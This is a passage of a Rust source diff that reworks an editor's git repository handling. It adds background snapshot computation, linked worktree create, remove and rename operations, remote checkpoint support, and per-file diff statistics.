self - .cached_status() - .filter_map(|entry| { - if let Some(ops) = self.pending_ops_for_path(&entry.repo_path) { - if !ops.staging() && !ops.staged() { + let snapshot = self.snapshot.clone(); + let pending_ops = self.pending_ops.clone(); + let to_unstage = cx.background_spawn(async move { + snapshot + .status() + .filter_map(|entry| { + if let Some(ops) = + pending_ops.get(&PathKey(entry.repo_path.as_ref().clone()), ()) + { + if !ops.staging() && !ops.staged() { + None + } else { + Some(entry.repo_path) + } + } else if entry.status.staging().is_fully_unstaged() { None } else { Some(entry.repo_path) } - } else if entry.status.staging().is_fully_unstaged() { - None - } else { - Some(entry.repo_path) - } - }) - .collect(); - self.stage_or_unstage_entries(false, to_unstage, cx) - } + }) + .collect() + }); - pub fn stash_all(&mut self, cx: &mut Context) -> Task> { - let to_stash = self.cached_status().map(|entry| entry.repo_path).collect(); + cx.spawn(async move |this, cx| { + let to_unstage = to_unstage.await; + this.update(cx, |this, cx| { + this.stage_or_unstage_entries(false, to_unstage, cx) + })? + .await + }) + } + + pub fn stash_all(&mut self, cx: &mut Context) -> Task> { + let to_stash = self.cached_status().map(|entry| entry.repo_path).collect(); self.stash_entries(to_stash, cx) } @@ -4967,8 +5316,7 @@ impl Repository { .map(|repo_path| repo_path.to_proto()) .collect(), }) - .await - .context("sending stash request")?; + .await?; Ok(()) } } @@ -5174,11 +5522,11 @@ impl Repository { options: Some(proto::commit::CommitOptions { amend: options.amend, signoff: options.signoff, + allow_empty: options.allow_empty, }), askpass_id, }) - .await - .context("sending commit request")?; + .await?; Ok(()) } @@ -5217,8 +5565,7 @@ impl Repository { askpass_id, remote: fetch_options.to_proto(), }) - .await - .context("sending fetch request")?; + .await?; Ok(RemoteCommandOutput { stdout: response.stdout, @@ -5286,7 +5633,7 @@ impl Repository { log::info!("head branch after scan is {branch:?}"); let snapshot = this.update(&mut cx, |this, cx| { this.snapshot.branch = branch; - cx.emit(RepositoryEvent::BranchChanged); + cx.emit(RepositoryEvent::HeadChanged); this.snapshot.clone() })?; if let Some(updates_tx) = updates_tx { @@ -5319,8 +5666,7 @@ impl Repository { } as i32), }) - .await - .context("sending push request")?; + .await?; Ok(RemoteCommandOutput { stdout: response.stdout, @@ -5386,8 +5732,7 @@ impl Repository { branch_name: branch.as_ref().map(|b| b.to_string()), remote_name: remote.to_string(), }) - .await - .context("sending pull request")?; + .await?; Ok(RemoteCommandOutput { stdout: response.stdout, @@ -5607,6 +5952,31 @@ impl Repository { }) } + /// If this is a linked worktree (*NOT* the main checkout of a repository), + /// returns the pathed for the linked worktree. + /// + /// Returns None if this is the main checkout. + pub fn linked_worktree_path(&self) -> Option<&Arc> { + if self.work_directory_abs_path != self.original_repo_abs_path { + Some(&self.work_directory_abs_path) + } else { + None + } + } + + pub fn path_for_new_linked_worktree( + &self, + branch_name: &str, + worktree_directory_setting: &str, + ) -> Result { + let original_repo = self.original_repo_abs_path.clone(); + let project_name = original_repo + .file_name() + .ok_or_else(|| anyhow!("git repo must have a directory name"))?; + let directory = worktrees_directory_for_repo(&original_repo, worktree_directory_setting)?; + Ok(directory.join(branch_name).join(project_name)) + } + pub fn worktrees(&mut self) -> oneshot::Receiver>> { let id = self.id; self.send_job(None, move |repo, _| async move { @@ -5634,28 +6004,222 @@ impl Repository { }) } + fn create_worktree_with_start_point( + &mut self, + start_point: CreateWorktreeStartPoint, + path: PathBuf, + commit: Option, + ) -> oneshot::Receiver> { + if matches!( + &start_point, + CreateWorktreeStartPoint::Branched { name } if name.is_empty() + ) { + let (sender, receiver) = oneshot::channel(); + sender + .send(Err(anyhow!("branch name cannot be empty"))) + .ok(); + return receiver; + } + + let id = self.id; + let message = match &start_point { + CreateWorktreeStartPoint::Detached => "git worktree add (detached)".into(), + CreateWorktreeStartPoint::Branched { name } => { + format!("git worktree add: {name}").into() + } + }; + + self.send_job(Some(message), move |repo, _cx| async move { + let branch_name = match start_point { + CreateWorktreeStartPoint::Detached => None, + CreateWorktreeStartPoint::Branched { name } => Some(name), + }; + let remote_name = branch_name.clone().unwrap_or_default(); + + match repo { + RepositoryState::Local(LocalRepositoryState { backend, .. }) => { + backend.create_worktree(branch_name, path, commit).await + } + RepositoryState::Remote(RemoteRepositoryState { project_id, client }) => { + client + .request(proto::GitCreateWorktree { + project_id: project_id.0, + repository_id: id.to_proto(), + name: remote_name, + directory: path.to_string_lossy().to_string(), + commit, + }) + .await?; + + Ok(()) + } + } + }) + } + pub fn create_worktree( &mut self, - name: String, - directory: PathBuf, + branch_name: String, + path: PathBuf, commit: Option, + ) -> oneshot::Receiver> { + self.create_worktree_with_start_point( + CreateWorktreeStartPoint::Branched { name: branch_name }, + path, + commit, + ) + } + + pub fn create_worktree_detached( + &mut self, + path: PathBuf, + commit: String, + ) -> oneshot::Receiver> { + self.create_worktree_with_start_point( + CreateWorktreeStartPoint::Detached, + path, + Some(commit), + ) + } + + pub fn head_sha(&mut self) -> oneshot::Receiver>> { + let id = self.id; + self.send_job(None, move |repo, _cx| async move { + match repo { + RepositoryState::Local(LocalRepositoryState { backend, .. }) => { + Ok(backend.head_sha().await) + } + RepositoryState::Remote(RemoteRepositoryState { project_id, client }) => { + let response = client + .request(proto::GitGetHeadSha { + project_id: project_id.0, + repository_id: id.to_proto(), + }) + .await?; + + Ok(response.sha) + } + } + }) + } + + pub fn update_ref( + &mut self, + ref_name: String, + commit: String, + ) -> oneshot::Receiver> { + self.send_job(None, move |repo, _cx| async move { + match repo { + RepositoryState::Local(LocalRepositoryState { backend, .. }) => { + backend.update_ref(ref_name, commit).await + } + RepositoryState::Remote(_) => { + anyhow::bail!("update_ref is not supported for remote repositories") + } + } + }) + } + + pub fn delete_ref(&mut self, ref_name: String) -> oneshot::Receiver> { + self.send_job(None, move |repo, _cx| async move { + match repo { + RepositoryState::Local(LocalRepositoryState { backend, .. }) => { + backend.delete_ref(ref_name).await + } + RepositoryState::Remote(_) => { + anyhow::bail!("delete_ref is not supported for remote repositories") + } + } + }) + } + + pub fn resolve_commit(&mut self, sha: String) -> oneshot::Receiver> { + self.send_job(None, move |repo, _cx| async move { + match repo { + RepositoryState::Local(LocalRepositoryState { backend, .. }) => { + let results = backend.revparse_batch(vec![sha]).await?; + Ok(results.into_iter().next().flatten().is_some()) + } + RepositoryState::Remote(_) => { + anyhow::bail!("resolve_commit is not supported for remote repositories") + } + } + }) + } + + pub fn repair_worktrees(&mut self) -> oneshot::Receiver> { + self.send_job(None, move |repo, _cx| async move { + match repo { + RepositoryState::Local(LocalRepositoryState { backend, .. }) => { + backend.repair_worktrees().await + } + RepositoryState::Remote(_) => { + anyhow::bail!("repair_worktrees is not supported for remote repositories") + } + } + }) + } + + pub fn commit_exists(&mut self, sha: String) -> oneshot::Receiver> { + self.send_job(None, move |repo, _cx| async move { + match repo { + RepositoryState::Local(LocalRepositoryState { backend, .. }) => { + let results = backend.revparse_batch(vec![sha]).await?; + Ok(results.into_iter().next().flatten().is_some()) + } + RepositoryState::Remote(_) => { + anyhow::bail!("commit_exists is not supported for remote repositories") + } + } + }) + } + + pub fn remove_worktree(&mut self, path: PathBuf, force: bool) -> oneshot::Receiver> { + let id = self.id; + self.send_job( + Some(format!("git worktree remove: {}", path.display()).into()), + move |repo, _cx| async move { + match repo { + RepositoryState::Local(LocalRepositoryState { backend, .. }) => { + backend.remove_worktree(path, force).await + } + RepositoryState::Remote(RemoteRepositoryState { project_id, client }) => { + client + .request(proto::GitRemoveWorktree { + project_id: project_id.0, + repository_id: id.to_proto(), + path: path.to_string_lossy().to_string(), + force, + }) + .await?; + + Ok(()) + } + } + }, + ) + } + + pub fn rename_worktree( + &mut self, + old_path: PathBuf, + new_path: PathBuf, ) -> oneshot::Receiver> { let id = self.id; self.send_job( - Some("git worktree add".into()), + Some(format!("git worktree move: {}", old_path.display()).into()), move |repo, _cx| async move { match repo { RepositoryState::Local(LocalRepositoryState { backend, .. }) => { - backend.create_worktree(name, directory, commit).await + backend.rename_worktree(old_path, new_path).await } RepositoryState::Remote(RemoteRepositoryState { project_id, client }) => { client - .request(proto::GitCreateWorktree { + .request(proto::GitRenameWorktree { project_id: project_id.0, repository_id: id.to_proto(), - name, - directory: directory.to_string_lossy().to_string(), - commit, + old_path: old_path.to_string_lossy().to_string(), + new_path: new_path.to_string_lossy().to_string(), }) .await?; @@ -5785,63 +6349,6 @@ impl Repository { }) } - /// Fetches per-line diff statistics (additions/deletions) via `git diff --numstat`. - pub fn diff_stat( - &mut self, - diff_type: DiffType, - _cx: &App, - ) -> oneshot::Receiver< - Result>, - > { - let id = self.id; - self.send_job(None, move |repo, _cx| async move { - match repo { - RepositoryState::Local(LocalRepositoryState { backend, .. }) => { - backend.diff_stat(diff_type).await - } - RepositoryState::Remote(RemoteRepositoryState { project_id, client }) => { - let (proto_diff_type, merge_base_ref) = match &diff_type { - DiffType::HeadToIndex => { - (proto::git_diff_stat::DiffType::HeadToIndex.into(), None) - } - DiffType::HeadToWorktree => { - (proto::git_diff_stat::DiffType::HeadToWorktree.into(), None) - } - DiffType::MergeBase { base_ref } => ( - proto::git_diff_stat::DiffType::MergeBase.into(), - Some(base_ref.to_string()), - ), - }; - let response = client - .request(proto::GitDiffStat { - project_id: project_id.0, - repository_id: id.to_proto(), - diff_type: proto_diff_type, - merge_base_ref, - }) - .await?; - - let stats = response - .entries - .into_iter() - .filter_map(|entry| { - let path = RepoPath::from_proto(&entry.path).log_err()?; - Some(( - path, - git::status::DiffStat { - added: entry.added, - deleted: entry.deleted, - }, - )) - }) - .collect(); - - Ok(stats) - } - } - }) - } - pub fn create_branch( &mut self, branch_name: String, @@ -5898,18 +6405,32 @@ impl Repository { ) } - pub fn delete_branch(&mut self, branch_name: String) -> oneshot::Receiver> { + pub fn delete_branch( + &mut self, + is_remote: bool, + branch_name: String, + ) -> oneshot::Receiver> { let id = self.id; self.send_job( - Some(format!("git branch -d {branch_name}").into()), + Some( + format!( + "git branch {} {}", + if is_remote { "-dr" } else { "-d" }, + branch_name + ) + .into(), + ), move |repo, _cx| async move { match repo { - RepositoryState::Local(state) => state.backend.delete_branch(branch_name).await, + RepositoryState::Local(state) => { + state.backend.delete_branch(is_remote, branch_name).await + } RepositoryState::Remote(RemoteRepositoryState { project_id, client }) => { client .request(proto::GitDeleteBranch { project_id: project_id.0, repository_id: id.to_proto(), + is_remote, branch_name, }) .await?; @@ -5975,12 +6496,24 @@ impl Repository { } pub fn checkpoint(&mut self) -> oneshot::Receiver> { - self.send_job(None, |repo, _cx| async move { + let id = self.id; + self.send_job(None, move |repo, _cx| async move { match repo { RepositoryState::Local(LocalRepositoryState { backend, .. }) => { backend.checkpoint().await } - RepositoryState::Remote(..) => anyhow::bail!("not implemented yet"), + RepositoryState::Remote(RemoteRepositoryState { project_id, client }) => { + let response = client + .request(proto::GitCreateCheckpoint { + project_id: project_id.0, + repository_id: id.to_proto(), + }) + .await?; + + Ok(GitRepositoryCheckpoint { + commit_sha: Oid::from_bytes(&response.commit_sha)?, + }) + } } }) } @@ -5989,12 +6522,22 @@ impl Repository { &mut self, checkpoint: GitRepositoryCheckpoint, ) -> oneshot::Receiver> { + let id = self.id; self.send_job(None, move |repo, _cx| async move { match repo { RepositoryState::Local(LocalRepositoryState { backend, .. }) => { backend.restore_checkpoint(checkpoint).await } - RepositoryState::Remote { .. } => anyhow::bail!("not implemented yet"), + RepositoryState::Remote(RemoteRepositoryState { project_id, client }) => { + client + .request(proto::GitRestoreCheckpoint { + project_id: project_id.0, + repository_id: id.to_proto(), + commit_sha: checkpoint.commit_sha.as_bytes().to_vec(), + }) + .await?; + Ok(()) + } } }) } @@ -6004,24 +6547,32 @@ impl Repository { update: proto::UpdateRepository, cx: &mut Context, ) -> Result<()> { - let conflicted_paths = TreeSet::from_ordered_entries( - update - .current_merge_conflicts - .into_iter() - .filter_map(|path| RepoPath::from_proto(&path).log_err()), - ); + if let Some(main_path) = &update.original_repo_abs_path { + self.snapshot.original_repo_abs_path = Path::new(main_path.as_str()).into(); + } + let new_branch = update.branch_summary.as_ref().map(proto_to_branch); let new_head_commit = update .head_commit_details .as_ref() .map(proto_to_commit_details); if self.snapshot.branch != new_branch || self.snapshot.head_commit != new_head_commit { - cx.emit(RepositoryEvent::BranchChanged) + cx.emit(RepositoryEvent::HeadChanged) } self.snapshot.branch = new_branch; self.snapshot.head_commit = new_head_commit; - self.snapshot.merge.conflicted_paths = conflicted_paths; + // We don't store any merge head state for downstream projects; the upstream + // will track it and we will just get the updated conflicts + let new_merge_heads = TreeMap::from_ordered_entries( + update + .current_merge_conflicts + .into_iter() + .filter_map(|path| Some((RepoPath::from_proto(&path).ok()?, vec![]))), + ); + let conflicts_changed = + self.snapshot.merge.merge_heads_by_conflicted_path != new_merge_heads; + self.snapshot.merge.merge_heads_by_conflicted_path = new_merge_heads; self.snapshot.merge.message = update.merge_message.map(SharedString::from); let new_stash_entries = GitStash { entries: update @@ -6034,6 +6585,15 @@ impl Repository { cx.emit(RepositoryEvent::StashEntriesChanged) } self.snapshot.stash_entries = new_stash_entries; + let new_linked_worktrees: Arc<[GitWorktree]> = update + .linked_worktrees + .iter() + .map(proto_to_worktree) + .collect(); + if *self.snapshot.linked_worktrees != *new_linked_worktrees { + cx.emit(RepositoryEvent::GitWorktreeListChanged); + } + self.snapshot.linked_worktrees = new_linked_worktrees; self.snapshot.remote_upstream_url = update.remote_upstream_url; self.snapshot.remote_origin_url = update.remote_origin_url; @@ -6054,10 +6614,11 @@ impl Repository { }), ) .collect::>(); - if !edits.is_empty() { + if conflicts_changed || !edits.is_empty() { cx.emit(RepositoryEvent::StatusesChanged); } self.snapshot.statuses_by_path.edit(edits, ()); + if update.is_last_update { self.snapshot.scan_id = update.scan_id; } @@ -6070,12 +6631,23 @@ impl Repository { left: GitRepositoryCheckpoint, right: GitRepositoryCheckpoint, ) -> oneshot::Receiver> { + let id = self.id; self.send_job(None, move |repo, _cx| async move { match repo { RepositoryState::Local(LocalRepositoryState { backend, .. }) => { backend.compare_checkpoints(left, right).await } - RepositoryState::Remote { .. } => anyhow::bail!("not implemented yet"), + RepositoryState::Remote(RemoteRepositoryState { project_id, client }) => { + let response = client + .request(proto::GitCompareCheckpoints { + project_id: project_id.0, + repository_id: id.to_proto(), + left_commit_sha: left.commit_sha.as_bytes().to_vec(), + right_commit_sha: right.commit_sha.as_bytes().to_vec(), + }) + .await?; + Ok(response.equal) + } } }) } @@ -6085,6 +6657,7 @@ impl Repository { base_checkpoint: GitRepositoryCheckpoint, target_checkpoint: GitRepositoryCheckpoint, ) -> oneshot::Receiver> { + let id = self.id; self.send_job(None, move |repo, _cx| async move { match repo { RepositoryState::Local(LocalRepositoryState { backend, .. }) => { @@ -6092,7 +6665,17 @@ impl Repository { .diff_checkpoints(base_checkpoint, target_checkpoint) .await } - RepositoryState::Remote { .. } => anyhow::bail!("not implemented yet"), + RepositoryState::Remote(RemoteRepositoryState { project_id, client }) => { + let response = client + .request(proto::GitDiffCheckpoints { + project_id: project_id.0, + repository_id: id.to_proto(), + base_commit_sha: base_checkpoint.commit_sha.as_bytes().to_vec(), + target_commit_sha: target_checkpoint.commit_sha.as_bytes().to_vec(), + }) + .await?; + Ok(response.diff) + } } }) } @@ -6141,23 +6724,9 @@ impl Repository { let RepositoryState::Local(LocalRepositoryState { backend, .. }) = state else { bail!("not a local repository") }; - let (snapshot, events) = this - .update(&mut cx, |this, _| { - this.paths_needing_status_update.clear(); - compute_snapshot( - this.id, - this.work_directory_abs_path.clone(), - this.snapshot.clone(), - backend.clone(), - ) - }) - .await?; + let snapshot = compute_snapshot(this.clone(), backend.clone(), &mut cx).await?; this.update(&mut cx, |this, cx| { - this.snapshot = snapshot.clone(); this.clear_pending_ops(cx); - for event in events { - cx.emit(event); - } }); if let Some(updates_tx) = updates_tx { updates_tx @@ -6189,7 +6758,7 @@ impl Repository { let state = RepositoryState::Local(state); let mut jobs = VecDeque::new(); loop { - while let Ok(Some(next_job)) = job_rx.try_next() { + while let Ok(next_job) = job_rx.try_recv() { jobs.push_back(next_job); } @@ -6225,7 +6794,7 @@ impl Repository { let state = RepositoryState::Remote(state); let mut jobs = VecDeque::new(); loop { - while let Ok(Some(next_job)) = job_rx.try_next() { + while let Ok(next_job) = job_rx.try_recv() { jobs.push_back(next_job); } @@ -6373,22 +6942,43 @@ impl Repository { return Ok(()); } + let has_head = prev_snapshot.head_commit.is_some(); + let stash_entries = backend.stash_entries().await?; let changed_path_statuses = cx .background_spawn(async move { let mut changed_paths = changed_paths.into_iter().flatten().collect::>(); - let statuses = backend - .status(&changed_paths.iter().cloned().collect::>()) - .await?; + let changed_paths_vec = changed_paths.iter().cloned().collect::>(); + + let status_task = backend.status(&changed_paths_vec); + let diff_stat_future = if has_head { + backend.diff_stat(&changed_paths_vec) + } else { + future::ready(Ok(status::GitDiffStat { + entries: Arc::default(), + })) + .boxed() + }; + + let (statuses, diff_stats) = + futures::future::try_join(status_task, diff_stat_future).await?; + + let diff_stats: HashMap = + HashMap::from_iter(diff_stats.entries.into_iter().cloned()); + let mut changed_path_statuses = Vec::new(); let prev_statuses = prev_snapshot.statuses_by_path.clone(); let mut cursor = prev_statuses.cursor::(()); for (repo_path, status) in &*statuses.entries { + let current_diff_stat = diff_stats.get(repo_path).copied(); + changed_paths.remove(repo_path); if cursor.seek_forward(&PathTarget::Path(repo_path), Bias::Left) - && cursor.item().is_some_and(|entry| entry.status == *status) + && cursor.item().is_some_and(|entry| { + entry.status == *status && entry.diff_stat == current_diff_stat + }) { continue; } @@ -6396,6 +6986,7 @@ impl Repository { changed_path_statuses.push(Edit::Insert(StatusEntry { repo_path: repo_path.clone(), status: *status, + diff_stat: current_diff_stat, })); } let mut cursor = prev_statuses.cursor::(()); @@ -6516,6 +7107,120 @@ impl Repository { } } +/// If `path` is a git linked worktree checkout, resolves it to the main +/// repository's working directory path. Returns `None` if `path` is a normal +/// repository, not a git repo, or if resolution fails. +/// +/// Resolution works by: +/// 1. Reading the `.git` file to get the `gitdir:` pointer +/// 2. Following that to the worktree-specific git directory +/// 3. Reading the `commondir` file to find the shared `.git` directory +/// 4. Deriving the main repo's working directory from the common dir +pub async fn resolve_git_worktree_to_main_repo(fs: &dyn Fs, path: &Path) -> Option { + let dot_git = path.join(".git"); + let metadata = fs.metadata(&dot_git).await.ok()??; + if metadata.is_dir { + return None; // Normal repo, not a linked worktree + } + // It's a .git file — parse the gitdir: pointer + let content = fs.load(&dot_git).await.ok()?; + let gitdir_rel = content.strip_prefix("gitdir:")?.trim(); + let gitdir_abs = fs.canonicalize(&path.join(gitdir_rel)).await.ok()?; + // Read commondir to find the main .git directory + let commondir_content = fs.load(&gitdir_abs.join("commondir")).await.ok()?; + let common_dir = fs + .canonicalize(&gitdir_abs.join(commondir_content.trim())) + .await + .ok()?; + Some(git::repository::original_repo_path_from_common_dir( + &common_dir, + )) +} + +/// Validates that the resolved worktree directory is acceptable: +/// - The setting must not be an absolute path. +/// - The resolved path must be either a subdirectory of the working +/// directory or a subdirectory of its parent (i.e., a sibling). +/// +/// Returns `Ok(resolved_path)` or an error with a user-facing message. +pub fn worktrees_directory_for_repo( + original_repo_abs_path: &Path, + worktree_directory_setting: &str, +) -> Result { + // Check the original setting before trimming, since a path like "///" + // is absolute but becomes "" after stripping trailing separators. + // Also check for leading `/` or `\` explicitly, because on Windows + // `Path::is_absolute()` requires a drive letter — so `/tmp/worktrees` + // would slip through even though it's clearly not a relative path. + if Path::new(worktree_directory_setting).is_absolute() + || worktree_directory_setting.starts_with('/') + || worktree_directory_setting.starts_with('\\') + { + anyhow::bail!( + "git.worktree_directory must be a relative path, got: {worktree_directory_setting:?}" + ); + } + + if worktree_directory_setting.is_empty() { + anyhow::bail!("git.worktree_directory must not be empty"); + } + + let trimmed = worktree_directory_setting.trim_end_matches(['/', '\\']); + if trimmed == ".." { + anyhow::bail!("git.worktree_directory must not be \"..\" (use \"../some-name\" instead)"); + } + + let joined = original_repo_abs_path.join(trimmed); + let resolved = util::normalize_path(&joined); + let resolved = if resolved.starts_with(original_repo_abs_path) { + resolved + } else if let Some(repo_dir_name) = original_repo_abs_path.file_name() { + resolved.join(repo_dir_name) + } else { + resolved + }; + + let parent = original_repo_abs_path + .parent() + .unwrap_or(original_repo_abs_path); + + if !resolved.starts_with(parent) { + anyhow::bail!( + "git.worktree_directory resolved to {resolved:?}, which is outside \ + the project root and its parent directory. It must resolve to a \ + subdirectory of {original_repo_abs_path:?} or a sibling of it." + ); + } + + Ok(resolved) +} + +/// Returns a short name for a linked worktree suitable for UI display +/// +/// Uses the main worktree path to come up with a short name that disambiguates +/// the linked worktree from the main worktree. +pub fn linked_worktree_short_name( + main_worktree_path: &Path, + linked_worktree_path: &Path, +) -> Option { + if main_worktree_path == linked_worktree_path { + return None; + } + + let project_name = main_worktree_path.file_name()?.to_str()?; + let directory_name = linked_worktree_path.file_name()?.to_str()?; + let name = if directory_name != project_name { + directory_name.to_string() + } else { + linked_worktree_path + .parent()? + .file_name()? + .to_str()? + .to_string() + }; + Some(name.into()) +} + fn get_permalink_in_rust_registry_src( provider_registry: Arc, path: PathBuf, @@ -6679,16 +7384,22 @@ fn branch_to_proto(branch: &git::repository::Branch) -> proto::Branch { fn worktree_to_proto(worktree: &git::repository::Worktree) -> proto::Worktree { proto::Worktree { path: worktree.path.to_string_lossy().to_string(), - ref_name: worktree.ref_name.to_string(), + ref_name: worktree + .ref_name + .as_ref() + .map(|s| s.to_string()) + .unwrap_or_default(), sha: worktree.sha.to_string(), + is_main: worktree.is_main, } } fn proto_to_worktree(proto: &proto::Worktree) -> git::repository::Worktree { git::repository::Worktree { path: PathBuf::from(proto.path.clone()), - ref_name: proto.ref_name.clone().into(), + ref_name: Some(SharedString::from(&proto.ref_name)), sha: proto.sha.clone().into(), + is_main: proto.is_main, } } @@ -6744,71 +7455,174 @@ fn proto_to_commit_details(proto: &proto::GitCommitDetails) -> CommitDetails { } } +/// This snapshot computes the repository state on the foreground thread while +/// running the git commands on the background thread. We update branch, head, +/// remotes, and worktrees first so the UI can react sooner, then compute file +/// state and emit those events immediately after. async fn compute_snapshot( - id: RepositoryId, - work_directory_abs_path: Arc, - prev_snapshot: RepositorySnapshot, + this: Entity, backend: Arc, -) -> Result<(RepositorySnapshot, Vec)> { - let mut events = Vec::new(); - let branches = backend.branches().await?; - let branch = branches.into_iter().find(|branch| branch.is_head); - let statuses = backend - .status(&[RepoPath::from_rel_path( - &RelPath::new(".".as_ref(), PathStyle::local()).unwrap(), - )]) + cx: &mut AsyncApp, +) -> Result { + let (id, work_directory_abs_path, prev_snapshot) = this.update(cx, |this, _| { + this.paths_needing_status_update.clear(); + ( + this.id, + this.work_directory_abs_path.clone(), + this.snapshot.clone(), + ) + }); + + let head_commit_future = { + let backend = backend.clone(); + async move { + Ok(match backend.head_sha().await { + Some(head_sha) => backend.show(head_sha).await.log_err(), + None => None, + }) + } + }; + let (branches, head_commit, all_worktrees) = cx + .background_spawn({ + let backend = backend.clone(); + async move { + futures::future::try_join3( + backend.branches(), + head_commit_future, + backend.worktrees(), + ) + .await + } + }) .await?; - let stash_entries = backend.stash_entries().await?; + let branch = branches.iter().find(|branch| branch.is_head).cloned(); + let branch_list: Arc<[Branch]> = branches.into(); + + let linked_worktrees: Arc<[GitWorktree]> = all_worktrees + .into_iter() + .filter(|wt| wt.path != *work_directory_abs_path) + .collect(); + + let (remote_origin_url, remote_upstream_url) = cx + .background_spawn({ + let backend = backend.clone(); + async move { + Ok::<_, anyhow::Error>( + futures::future::join( + backend.remote_url("origin"), + backend.remote_url("upstream"), + ) + .await, + ) + } + }) + .await?; + + let snapshot = this.update(cx, |this, cx| { + let head_changed = + branch != this.snapshot.branch || head_commit != this.snapshot.head_commit; + let branch_list_changed = *branch_list != *this.snapshot.branch_list; + let worktrees_changed = *linked_worktrees != *this.snapshot.linked_worktrees; + + this.snapshot = RepositorySnapshot { + id, + work_directory_abs_path, + branch, + branch_list: branch_list.clone(), + head_commit, + remote_origin_url, + remote_upstream_url, + linked_worktrees, + scan_id: prev_snapshot.scan_id + 1, + ..prev_snapshot + }; + + if head_changed { + cx.emit(RepositoryEvent::HeadChanged); + } + + if branch_list_changed { + cx.emit(RepositoryEvent::BranchListChanged); + } + + if worktrees_changed { + cx.emit(RepositoryEvent::GitWorktreeListChanged); + } + + this.snapshot.clone() + }); + + let (statuses, diff_stats, stash_entries) = cx + .background_spawn({ + let backend = backend.clone(); + let snapshot = snapshot.clone(); + async move { + let diff_stat_future: BoxFuture<'_, Result> = + if snapshot.head_commit.is_some() { + backend.diff_stat(&[]) + } else { + future::ready(Ok(status::GitDiffStat { + entries: Arc::default(), + })) + .boxed() + }; + futures::future::try_join3( + backend.status(&[RepoPath::from_rel_path( + &RelPath::new(".".as_ref(), PathStyle::local()).unwrap(), + )]), + diff_stat_future, + backend.stash_entries(), + ) + .await + } + }) + .await?; + + let diff_stat_map: HashMap<&RepoPath, DiffStat> = + diff_stats.entries.iter().map(|(p, s)| (p, *s)).collect(); + let mut conflicted_paths = Vec::new(); let statuses_by_path = SumTree::from_iter( - statuses - .entries - .iter() - .map(|(repo_path, status)| StatusEntry { + statuses.entries.iter().map(|(repo_path, status)| { + if status.is_conflicted() { + conflicted_paths.push(repo_path.clone()); + } + StatusEntry { repo_path: repo_path.clone(), status: *status, - }), + diff_stat: diff_stat_map.get(repo_path).copied(), + } + }), (), ); - let (merge_details, merge_heads_changed) = - MergeDetails::load(&backend, &statuses_by_path, &prev_snapshot).await?; - log::debug!("new merge details (changed={merge_heads_changed:?}): {merge_details:?}"); - - if merge_heads_changed { - events.push(RepositoryEvent::MergeHeadsChanged); - } - if statuses_by_path != prev_snapshot.statuses_by_path { - events.push(RepositoryEvent::StatusesChanged) - } + let merge_details = cx + .background_spawn({ + let backend = backend.clone(); + let mut merge_details = snapshot.merge.clone(); + async move { + let conflicts_changed = merge_details.update(&backend, conflicted_paths).await?; + Ok::<_, anyhow::Error>((merge_details, conflicts_changed)) + } + }) + .await?; + let (merge_details, conflicts_changed) = merge_details; + log::debug!("new merge details: {merge_details:?}"); - // Useful when branch is None in detached head state - let head_commit = match backend.head_sha().await { - Some(head_sha) => backend.show(head_sha).await.log_err(), - None => None, - }; + Ok(this.update(cx, |this, cx| { + if conflicts_changed || statuses_by_path != this.snapshot.statuses_by_path { + cx.emit(RepositoryEvent::StatusesChanged); + } + if stash_entries != this.snapshot.stash_entries { + cx.emit(RepositoryEvent::StashEntriesChanged); + } - if branch != prev_snapshot.branch || head_commit != prev_snapshot.head_commit { - events.push(RepositoryEvent::BranchChanged); - } - - let remote_origin_url = backend.remote_url("origin").await; - let remote_upstream_url = backend.remote_url("upstream").await; - - let snapshot = RepositorySnapshot { - id, - statuses_by_path, - work_directory_abs_path, - path_style: prev_snapshot.path_style, - scan_id: prev_snapshot.scan_id + 1, - branch, - head_commit, - merge: merge_details, - remote_origin_url, - remote_upstream_url, - stash_entries, - }; + this.snapshot.scan_id += 1; + this.snapshot.merge = merge_details; + this.snapshot.statuses_by_path = statuses_by_path; + this.snapshot.stash_entries = stash_entries; - Ok((snapshot, events)) + this.snapshot.clone() + })) } fn status_from_proto( diff --git a/crates/project/src/git_store/branch_diff.rs b/crates/project/src/git_store/branch_diff.rs index 3b8324fce8ffea7049838aeac09e831463dbd34e..dc7c8bf647585d9fcf1d5f92e0e976f86939a781 100644 --- a/crates/project/src/git_store/branch_diff.rs +++ b/crates/project/src/git_store/branch_diff.rs @@ -70,7 +70,7 @@ impl BranchDiff { } GitStoreEvent::RepositoryUpdated( event_repo_id, - RepositoryEvent::StatusesChanged | RepositoryEvent::BranchChanged, + RepositoryEvent::StatusesChanged | RepositoryEvent::HeadChanged, _, ) => this .repo diff --git a/crates/project/src/image_store.rs b/crates/project/src/image_store.rs index 654fb0344db4b7dc581234a5b446e8ac4d2b10ab..0ba9787d2e4144cb529756b15fc05ff72dab83c8 100644 --- a/crates/project/src/image_store.rs +++ b/crates/project/src/image_store.rs @@ -808,7 +808,10 @@ impl LocalImageStore { let new_file = if let Some(entry) = snapshot_entry { worktree::File { disk_state: match entry.mtime { - Some(mtime) => DiskState::Present { mtime }, + Some(mtime) => DiskState::Present { + mtime, + size: entry.size, + }, None => old_file.disk_state, }, is_local: true, diff --git a/crates/project/src/lsp_command.rs b/crates/project/src/lsp_command.rs index bd94378433d7a8d992b913258999a6004b8031f2..d4a4f9b04968413c51607f71047752a9b779b79a 100644 --- a/crates/project/src/lsp_command.rs +++ b/crates/project/src/lsp_command.rs @@ -18,7 +18,7 @@ use gpui::{App, AsyncApp, Entity, SharedString, Task, prelude::FluentBuilder}; use language::{ Anchor, Bias, Buffer, BufferSnapshot, CachedLspAdapter, CharKind, CharScopeContext, OffsetRangeExt, PointUtf16, ToOffset, ToPointUtf16, Transaction, Unclipped, - language_settings::{InlayHintKind, LanguageSettings, language_settings}, + language_settings::{InlayHintKind, LanguageSettings}, point_from_lsp, point_to_lsp, proto::{ deserialize_anchor, deserialize_anchor_range, deserialize_version, serialize_anchor, @@ -533,7 +533,7 @@ impl LspCommand for PerformRename { .rename_provider .is_some_and(|capability| match capability { OneOf::Left(enabled) => enabled, - OneOf::Right(_options) => true, + OneOf::Right(_) => true, }) } @@ -2636,11 +2636,10 @@ impl LspCommand for GetCodeActions { relevant_diagnostics.push(entry.to_lsp_diagnostic_stub()?); } - let supported = - Self::supported_code_action_kinds(language_server.adapter_server_capabilities()); - let only = if let Some(requested) = &self.kinds { - if let Some(supported_kinds) = supported { + if let Some(supported_kinds) = + Self::supported_code_action_kinds(language_server.adapter_server_capabilities()) + { let filtered = requested .iter() .filter(|requested_kind| { @@ -2655,7 +2654,7 @@ impl LspCommand for GetCodeActions { 